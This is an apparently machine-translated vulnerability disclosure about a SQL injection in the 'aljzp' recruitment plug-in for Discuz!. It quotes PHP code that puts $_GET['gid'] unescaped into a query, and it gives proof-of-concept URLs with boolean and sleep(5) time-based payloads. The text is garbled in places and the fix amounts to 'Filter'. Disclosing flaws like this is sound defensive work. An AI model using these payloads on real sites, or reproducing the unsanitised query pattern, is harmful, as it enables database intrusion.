Discuz! SQL Injection for a plug-in (High Version accumulation, unlimited low Version)

Discuz! SQL Injection for a plug-in (High Version accumulation, unlimited low Version)

Discuz! SQL Injection for a plug-in (High Version accumulation, unlimited low Version)

 

This was actually sent last time, but it was not written. I will write it again here.



This plug-in belongs to the recruitment module of the bright sword series:



Aljzp. inc. php:

}else if($_GET['act'] == 'touid'){if(!$_G['uid']){showmessage(lang('plugin/aljzp','aljzp_1'), '', array(), array('login' => true));}if(!DB::result_first("select sign from ".DB::table('aljzp_getresume')." where id=".$_GET['gid'])){DB::update('aljzp_getresume',array('sign'=>1),'id='.$_GET[gid]);DB::update('aljzp_sentresume',array('sign'=>1),'id='.$_GET[sid]);}$regions = C::t('#aljzp#aljzp_region')->range();    $pos = C::t('#aljzp#aljzp_position')->range();$lp=C::t('#aljzp#aljzp_resume')->fetch($_GET['uid']);include template('aljzp:touid');}else if ($_GET['act'] == 'reflash') {</code>

See this sentence:

! DB: result_first ("select sign from". DB: table ('aljzp _ getresume '). "where id =". $ _ GET ['gid'])



Here we directly go to the SQL query. Let's take a look at the url:



Http: // localhost/Discuz_X3.2_ SC _UTF8/upload/plugin. php? Id = aljzp & act = touid & gid = 1% 20and % 201 = 1



The SQL statements captured in the background are
 

There is not much to say here. There is not much research on bypassing 3.2, but the error injection can be used in the past 3.2.





Here we install version 2.5 and upgrade it to the latest version. Then we only perform one test.



Http: // 127.0.0.1: 81/plugin. php? Id = aljzp & act = touid & gid = sleep (5)



This is a 2.5 but missing sleep function that has been patched.



Latency: 5 seconds.

  Solution:

Filter